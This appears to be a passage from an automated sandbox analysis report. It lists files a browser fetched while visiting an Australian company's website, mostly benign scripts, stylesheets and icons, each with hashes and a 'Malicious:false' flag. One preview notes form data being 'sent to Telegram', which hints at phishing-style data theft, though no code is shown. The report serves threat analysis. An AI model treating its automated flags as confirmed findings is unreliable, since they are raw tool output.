                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:3iuBMLCjEeBFBrRN8E:3iO/rn8E
                                                                                                                                                                                                            MD5:92223B57ABEDFA8AA757621735C2F036
                                                                                                                                                                                                            SHA1:AB01E79D7EB098331EB3B325199053A62AB80FDD
                                                                                                                                                                                                            SHA-256:CDC2A6A2EFFB6195726659372444D369173C3A31D193962C715D4F050D766DAC
                                                                                                                                                                                                            SHA-512:7DCB39E050ADAE65EE0D06659C98F078F36B8204EE865B8D71B5CAA60D9DF4BEF77ABEE78D9B922274EA0FEE44DFB694EA768D788C22A167B0477297AD5E7278
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                            MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                            SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                            SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                            SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/libs/granite/csrf/token.json
                                                                                                                                                                                                            Preview:{}
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32730)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):430018
                                                                                                                                                                                                            Entropy (8bit):5.371844747679136
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:751zU/u3sgauHSp0H/G3KFVbHvbQncHPGXj:jcucgauHSpnKFVbHvbQncHPO
                                                                                                                                                                                                            MD5:877956833EDC7A947734722C9A3BBB84
                                                                                                                                                                                                            SHA1:D2703300A2084FBCF3D596FBCC0C4A6007AD2BA3
                                                                                                                                                                                                            SHA-256:34BAB527C6284CA8AD76C206BD6BDCE43E7A587652A544F7D673542B266B1CFC
                                                                                                                                                                                                            SHA-512:4DF7ED6845552642CB79F956278150FFD71DBB85E8558919DC3144C6CEEE569DCADEA9BBD93719FC21697622FCF4741E63EACD696A6A7737BB2CC79B7B08CA5D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:// For license information, see `https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-08-29T04:29:57Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"EN4406273eae824fa9a4a08164ecb82367",stage:"production"},dataElements:{"Interaction Link (custom)":{forceLowerCase:!0,cleanText:!0,modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(e){if(e&&e.component&&e.component.hasOwnProperty("interactionLink"))return e.component.interactionLink}}},"DOM | Link URL":{cleanText:!0,modulePath:"core/src/lib/dataElements/domAttribute.js",settings:{elementProperty:"href",elementSelector:"#container-5cd4c0bcf1 > div > div > div > div.header--container.has-utility > div.header--utility-container > ul > li:nth-child(1) > a"}},"ACDL | branchName":{cleanText:!0,modulePath:"core/src/lib/dataElements/customCode.js",setti
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (901)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):9362
                                                                                                                                                                                                            Entropy (8bit):5.525293695812333
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Kiqh0ZNPCOnl9ByQEwppSwv1AASCYUdGi1FXvp9wwy4fhS8pYm:xn/9fEOpTWASiGmFXvTjy4fo8x
                                                                                                                                                                                                            MD5:5F574E201A896E0CF9D425737A913595
                                                                                                                                                                                                            SHA1:3E00A94409D16783635C1336CCBF9EF85D77FFAD
                                                                                                                                                                                                            SHA-256:D367297EE182C6AE9D6CD1BD180A4CC19D78A12CB4EADB1B7E0AF6F01AA343B8
                                                                                                                                                                                                            SHA-512:8292609F1163D4858B470ADAE1A7434272EB51E7BFBED7F7E9C2003F1B8073182F858F01BD3E55808216A2727A94BA9A64796F3D1EE44ECCB99BF6F0379B18C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://yourir.info/40cb4d5b590922d8.js
                                                                                                                                                                                                            Preview:/*. * YourIR loader for Elders Investor Relations. * (c) 2024 Iguana2 Pty. Ltd.. *. * Strictly for the sole use of Elders on its Investor Relations web pages only. *. * Last updated: 2024-07-16T10:13:40Z. */.!function(e,a){"use strict";var o=(e.document,e.location,e.yourirSetup),t={version:"1.15.18",startup:{processLocationHash:!0,addLoadedCSS:!0,addStyleSheet:!1,removeLoadingCSS:!0},autoUpdate:{enable:!0,libVersion:"1.15.18",loaderChecksum:"a99c9fb1a98083d468b729c9035f7c74"},preload:{enable:!0,symbolData:!0},theme:"default",contexts:{default:{symbol:"eld.asx",allowedSymbols:["eld.asx"],consolidate:!0,streamUpdates:!1}},components:{defaults:{liveness:"delayed"},announcements:{includeOtherIssuers:!1,liveness:"live"},priceComparisonChart:{comparisonSymbol1:"xjo.asx"}},resources:{check:!1}},s=[t];if(t.appID=/* this appID (Application Identifier) is strictly for the sole use of Elders */"40cb4d5b590922d8",e.yourirAutoUpdate&&t.autoUpdate&&t.autoUpdate.enable)return void e.yourirAutoUpdate(
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1469)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):127970
                                                                                                                                                                                                            Entropy (8bit):4.925115282976446
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Ia9RNAJRntn/NAJRnOgxnpSG0gRcAeex3riXk1wt+e7WRRSTlCxcj5uzmC/7+Loq:IaqJRtmJROgxnpSKAO6zkosbnxpt4
                                                                                                                                                                                                            MD5:DE3A13856264E0A5F9A3056F8DCA43C3
                                                                                                                                                                                                            SHA1:D68605671A8ADDC598D7F4DAF79FBCD24147EF74
                                                                                                                                                                                                            SHA-256:DA9643FD1EAFC7B888626B51CD2275426E74088B59C2562746D4F3F1A12DF3C0
                                                                                                                                                                                                            SHA-512:D4D13FE3D8B4E8C7BCA2A666FBBC38B060DF41B63FB88D749CABCCC70EFC531AF1B09D5F9E402FC16A931BA0FDDC018F3BF9C0773EEB42F9AA71FD5E8F97BDFD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-base.lc-de3a13856264e0a5f9a3056f8dca43c3-lc.min.css
                                                                                                                                                                                                            Preview:.cmp-accordion__header{margin:0}..cmp-accordion__button{display:block;width:100%;text-align:left}..cmp-accordion__panel--hidden{display:none}..cmp-accordion__panel--expanded{display:block}..cmp-tabs__tablist{display:flex;flex-wrap:wrap;padding-left:0;list-style:none}..cmp-tabs__tab{box-sizing:border-box;border-bottom:1px solid transparent;padding:.5rem 1rem;cursor:pointer}..cmp-tabs__tab--active{border-color:inherit}..cmp-tabs__tabpanel{display:none}..cmp-tabs__tabpanel--active{display:block}..cmp-carousel__content{position:relative}..cmp-carousel__item{display:none}..cmp-carousel__item--active{display:block}..cmp-carousel__action{-webkit-appearance:none;-moz-appearance:none;appearance:none}..cmp-carousel__indicators{display:flex;flex-wrap:wrap;justify-content:center;margin:0;padding:0;list-style:none}..cmp-carousel__indicator{position:relative;flex:0 1 auto;width:10px;height:10px;margin:0 7px;border-radius:50%;font-size:0;text-indent:-3000px;background-color:rgba(0,0,0,0.5)}..cmp-caro
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):510
                                                                                                                                                                                                            Entropy (8bit):4.497462332670602
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:trVmvAuCwSNxLXOO5NJLsZlHkrZMzP8hpGcq+:tZm4uaNUTGMrBcq+
                                                                                                                                                                                                            MD5:73B4C1811F61B251388096354D1F301A
                                                                                                                                                                                                            SHA1:D8392C6B64CDA5BD49D9317693B623E3CB9DAE50
                                                                                                                                                                                                            SHA-256:2E81C317E3C07984BDE4B9377CC1E341E2368FB2E73A7E008C099D0BEB2F258F
                                                                                                                                                                                                            SHA-512:7D377F12A7BC974B1E8D131183D3FBBB3595C57BA17601C96D0DEB447D283A85281872B82B7797C5D6D7D13F72DF4A96FBB4A6896CBF2E7CF992C456EFC639FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-chevron-left.svg
                                                                                                                                                                                                            Preview:<svg width="12" height="20" viewBox="0 0 12 20" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M11.1454 0.222218C11.3642 0.222218 11.5826 0.302565 11.7497 0.463673C12.0834 0.785475 12.0834 1.30712 11.7497 1.62892L2.95207 10.1112L11.7497 18.5934C12.0834 18.9152 12.0834 19.4368 11.7497 19.7586C11.4159 20.0805 10.8749 20.0805 10.5411 19.7586L1.13921 10.6938C0.805448 10.372 0.805448 9.85034 1.13921 9.52854L10.5411 0.463673C10.7082 0.302565 10.9266 0.222218 11.1454 0.222218Z" fill="#9E9FA2"/>.</svg>.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (511)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1271
                                                                                                                                                                                                            Entropy (8bit):5.184130085081704
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:2Q+Bvk+oX/IP2iJyep9Mf9MWIMyMZ2iJRcM2n3k2RRnDbLMWhTtMXy99MJVOfMsX:P/1op9M1MTMyMIjM23pbD/MUtMXy99M0
                                                                                                                                                                                                            MD5:0A6AFF292F5CC42142779CDE92054524
                                                                                                                                                                                                            SHA1:7A4B1CB962793F47ED138A8DF2D5E4D49E73335A
                                                                                                                                                                                                            SHA-256:C250924012FDC9EA9516B30650895201CD167DBD49C9D148924F30881ABFA393
                                                                                                                                                                                                            SHA-512:A9934DC7FFF0FA59069A815C3CF795148E9A36759017037DEF66E6A228D650139FD364A004DA7A8F0706E4B28E7AA1F63A8B5F7A3BD0270369EAE9AF82D64403
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:(function(){window.CQ=window.CQ||{};window.CQ.CoreComponents=window.CQ.CoreComponents||{};window.CQ.CoreComponents.container=window.CQ.CoreComponents.container||{};window.CQ.CoreComponents.container.utils={};window.CQ.CoreComponents.container.utils={removeUrlHash:function(){history.replaceState(void 0,void 0," ")},updateUrlHash:function(a,b,c){a&&a._elements&&a._elements[b]&&a._elements[b][c]&&a._elements[b][c].id&&history.replaceState(void 0,void 0,"#"+a._elements[b][c].id)},getDeepLinkItemIdx:function(a,.b,c){if(window.location.hash){var d=window.location.hash.substring(1);if(d&&document.getElementById(d)&&a&&a._config&&a._config.element&&a._elements[b]&&a._config.element.querySelector("[id\x3d'"+d+"']"))for(var e=0;e<a._elements[b].length;e++){var g=a._elements[b][e],f=!1;a._elements[c]&&(f=(f=a._elements[c][e])&&f.querySelector("[id\x3d'"+d+"']"));if(g.id===d||f)return e}}return-1},getDeepLinkItem:function(a,b,c){c=window.CQ.CoreComponents.container.utils.getDeepLinkItemIdx(a,b,c);
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                            Entropy (8bit):5.01142858375393
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:tRBRNq8Ns+IjSKcvSuXF4q7SLvDmJS4RKb58FNQrFuHrQddQ1Eo6GSyrJVAej+Kh:tnrrzSuzumc4slZRIkfEJVRnGhk5
                                                                                                                                                                                                            MD5:9D9473FD130B0A7C6B8E9AF9E592519B
                                                                                                                                                                                                            SHA1:0C03C3B2C9895B24902BF0E56B4DCBBEAB3623AF
                                                                                                                                                                                                            SHA-256:DC4EE6726A4F0D64C20C6C287B4D05A81462E66D4CCE140DDF74041CC86CEC36
                                                                                                                                                                                                            SHA-512:7DF3656954DD331CA2ADAF0EFFF513B9F74FB05D3E2FEE76A940C7574CA62FB0CEE6F7698AC1EE2BE6D9ED9D089B7EEAED7049BF59C82EE2B32CA3221732CB11
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-right-chevron-red.svg
                                                                                                                                                                                                            Preview:<svg width="7" height="12" viewBox="0 0 7 12" fill="none" xmlns="http://www.w3.org/2000/svg">. <path d="M5.05885 6L0 1.10035L1.13634 0L7 6L1.13634 12L0 10.8997L5.05885 6Z" fill="#D21E24"/>.</svg>
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2345)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):200761
                                                                                                                                                                                                            Entropy (8bit):5.529010823261649
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:QPwizDGLETrtkA0f5yptcY0/H8+bEQDmKD0C8rT/Xy:qGLgrt2YjWx0C8rT/i
                                                                                                                                                                                                            MD5:84B3248AA8E0B08B2ACC09A5D01D239B
                                                                                                                                                                                                            SHA1:7D469DF2DE61EF24AEF30FD5EA530311AB1097AC
                                                                                                                                                                                                            SHA-256:082F93E0C8276BC432BE2FD4FD9BDFDA8C05A40D877EC6DCBCD653F5B7EFEA62
                                                                                                                                                                                                            SHA-512:FDD91F4554213B93163414BC33EDAAA1D4BE6CE59E003DE7E374CD3049A2C574E56C4E9F559FD5B9994972BF899AD74AD0A2BF420EBCFD5B9713EAE1A5802737
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://www.googletagmanager.com/gtm.js?id=GTM-MR5ZTSCQ
                                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__mf","metadata":["map"],"once_per_event":true,"vtp_projectId":"b953cf15-e568-418d-a9cb-1ea0cf6357a5","tag_id":4}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. ,[50,"__mf",[46,"a"],[41,"h"],[52,"b",["require","createQueue"]],[52,"c",["require","inj
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):555
                                                                                                                                                                                                            Entropy (8bit):7.377837241745018
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:6v/7j/6Ts/CL0GLt/VSoxHaeDzxLNHGOmCvH1mF2aJVhmunTU:u/6z0GL9VSoxHN3xLNHGOzvHsFLqwTU
                                                                                                                                                                                                            MD5:109D055C7F1557CEE036E5BCF7E16030
                                                                                                                                                                                                            SHA1:2137ED0ED2E8A90FB2E0CC1458C278CD540EBEFD
                                                                                                                                                                                                            SHA-256:2E75CD7584C5561BD6CFBFF760686A093CABF74A4D8A73DC49A91C19F89D0E81
                                                                                                                                                                                                            SHA-512:65B8C35792174766DC2C6B956C0B45011E7717D17CA2E1CEDA3B2BB071B934884E58B6F024E7B095AAF8BC8E6BBA25A2417F3591062C4E9A2CD8C309B9E0C430
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/icons---logos/icons/find-expert.png
                                                                                                                                                                                                            Preview:.PNG........IHDR..............l;....pHYs.................sRGB.........gAMA......a.....IDATx..T1V.@..Y...Y./>..r...z.<.z...z...z...........`...q..6.H,...f....AH..N.H.8......!..2.z..b...+...S."... .Ea......i]'."..m.c...Y.....V8P.N.n.6.hds'.XD"...f..&q{.3.]..Z..l..2./.._...F,Yl...x,>.....Q..3....E.Ig..3..3\ Mw.n..-W.D...-.E....7..0....#..PovOkv.|e..6..=?...f..Qq2w,.....uo.(..!.M...v.<4..%V8$.=-.=...\B..)Pw=...'4.....(..je^..0I>xs.iWl..s..X6~.j..d...*....l...|...K..@.sH..u5.... j...=.<M......;ljID..l=-.....C,..........IEND.B`.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (760)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):101682
                                                                                                                                                                                                            Entropy (8bit):5.4801097429116385
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:uyefSIz4emwRsSragavOIYdD3ise8Ux+rHi:uPfTz4emSD3o8Ux+rHi
                                                                                                                                                                                                            MD5:F9E8E8C279BAF6A1A278042AFE4F395A
                                                                                                                                                                                                            SHA1:D2631D76F948170994789F4C449098EF8A1160AE
                                                                                                                                                                                                            SHA-256:AC9C69C1F6DF29993331F7E3F9B7EC6D343575D60F4A5795456422E33BCF15D2
                                                                                                                                                                                                            SHA-512:24DA116ACBB4BCCE90B5DB29BAD1B65E84401E97358194A688C75ABC3AB34D4AEB4A2F918A3E15B42BB715FA160827A06FEBC33E8C382BA8058DB58DF3A159D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js
                                                                                                                                                                                                            Preview:/*. jQuery JavaScript Library v1.12.4-aem. http://jquery.com/.. Includes Sizzle.js. http://sizzlejs.com/.. Copyright jQuery Foundation and other contributors. Released under the MIT license. http://jquery.org/license.. Date: 2016-05-20T17:17Z. Sizzle CSS Selector Engine v2.2.1. http://sizzlejs.com/.. Copyright jQuery Foundation and other contributors. Released under the MIT license. http://jquery.org/license.. Date: 2015-10-17. jQuery requestAnimationFrame - 0.2.2 - 2016-10-26. https://github.com/gnarf37/jquery-requestAnimationFrame. Copyright (c) 2016 Corey Frang; Licensed MIT */.(function(y,na){"object"===typeof module&&"object"===typeof module.exports?module.exports=y.document?na(y,!0):function(ja){if(!ja.document)throw Error("jQuery requires a window with a document");return na(ja)}:na(y)})("undefined"!==typeof window?window:this,function(y,na){function ja(a){var b=!!a&&"length"in a&&a.length,d=c.type(a);return"function"===d||c.isWindow(a)?!1:"array"===d||0===b||"number"===typeof b
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2485)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):25607
                                                                                                                                                                                                            Entropy (8bit):5.299200052135676
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYMpR8ZkQuF0vLO+UXfSCK:RIT7sZwuvL54WAcl/7K
                                                                                                                                                                                                            MD5:48EA8373BD38CCB271F71561CCF70F1E
                                                                                                                                                                                                            SHA1:6379F6AFB2727113965D748DCAC52476DA087B12
                                                                                                                                                                                                            SHA-256:C2FBB1BE336052AA53329BA199C6845863B3AA6EC1F7F1C3BDD588A00658DEC4
                                                                                                                                                                                                            SHA-512:2830CF1EBC05645EDFB162BF55B36E2A3D8BD8F2E48048F07AD894DD25EA1890667FF08B2BD6DC73FF0614D7369E58C9B1F23626B02D3172A0AEA83424382D34
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://connect.facebook.net/signals/config/842278510644971?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128
                                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (511)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1271
                                                                                                                                                                                                            Entropy (8bit):5.184130085081704
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:2Q+Bvk+oX/IP2iJyep9Mf9MWIMyMZ2iJRcM2n3k2RRnDbLMWhTtMXy99MJVOfMsX:P/1op9M1MTMyMIjM23pbD/MUtMXy99M0
                                                                                                                                                                                                            MD5:0A6AFF292F5CC42142779CDE92054524
                                                                                                                                                                                                            SHA1:7A4B1CB962793F47ED138A8DF2D5E4D49E73335A
                                                                                                                                                                                                            SHA-256:C250924012FDC9EA9516B30650895201CD167DBD49C9D148924F30881ABFA393
                                                                                                                                                                                                            SHA-512:A9934DC7FFF0FA59069A815C3CF795148E9A36759017037DEF66E6A228D650139FD364A004DA7A8F0706E4B28E7AA1F63A8B5F7A3BD0270369EAE9AF82D64403
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/core/wcm/components/commons/site/clientlibs/container.lc-0a6aff292f5cc42142779cde92054524-lc.min.js
                                                                                                                                                                                                            Preview:(function(){window.CQ=window.CQ||{};window.CQ.CoreComponents=window.CQ.CoreComponents||{};window.CQ.CoreComponents.container=window.CQ.CoreComponents.container||{};window.CQ.CoreComponents.container.utils={};window.CQ.CoreComponents.container.utils={removeUrlHash:function(){history.replaceState(void 0,void 0," ")},updateUrlHash:function(a,b,c){a&&a._elements&&a._elements[b]&&a._elements[b][c]&&a._elements[b][c].id&&history.replaceState(void 0,void 0,"#"+a._elements[b][c].id)},getDeepLinkItemIdx:function(a,.b,c){if(window.location.hash){var d=window.location.hash.substring(1);if(d&&document.getElementById(d)&&a&&a._config&&a._config.element&&a._elements[b]&&a._config.element.querySelector("[id\x3d'"+d+"']"))for(var e=0;e<a._elements[b].length;e++){var g=a._elements[b][e],f=!1;a._elements[c]&&(f=(f=a._elements[c][e])&&f.querySelector("[id\x3d'"+d+"']"));if(g.id===d||f)return e}}return-1},getDeepLinkItem:function(a,b,c){c=window.CQ.CoreComponents.container.utils.getDeepLinkItemIdx(a,b,c);
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):244295
                                                                                                                                                                                                            Entropy (8bit):5.454185343611895
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:pfLeYH8AtPJ137OeR8NteqZEbkxZNsucrl0xYurPK713FN:pfLeYc+PJxH8NNfFcrHurPK713j
                                                                                                                                                                                                            MD5:B5322CFCA51C69074051C6B148CE5A6C
                                                                                                                                                                                                            SHA1:A995F0F78FE3147A4BF3D0503F9A123FDDAD0CD0
                                                                                                                                                                                                            SHA-256:55270971FDC4172D5CBBA95DADD779074EADB9C50BF16C2B3253CCC6BC8FC363
                                                                                                                                                                                                            SHA-512:9D1824E860609AF7AB2775ACE28D22DED11D4678B89351B34BC03A54527D7C3029238DE45C126E52150B9A87F9242039679F3A646A2F5C7E46D66EE19BB051BE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.75
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:HTzY:zzY
                                                                                                                                                                                                            MD5:271C33406833AC99FFA7A58F5D7B6D26
                                                                                                                                                                                                            SHA1:FB9DF784770B432F03F83FADC06A4604B41E95DF
                                                                                                                                                                                                            SHA-256:2EA92B641D36E8174C1260B0127584E720C65B89C52CA134D2F8B03CD752E373
                                                                                                                                                                                                            SHA-512:3B4D4347D291E40357B357B6E68841EFFB00D29610554521112200144E9E746A391975CD2A4CA323B918AB6AFADF17AD62C89136CF0275806D00092B07B6DAE9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
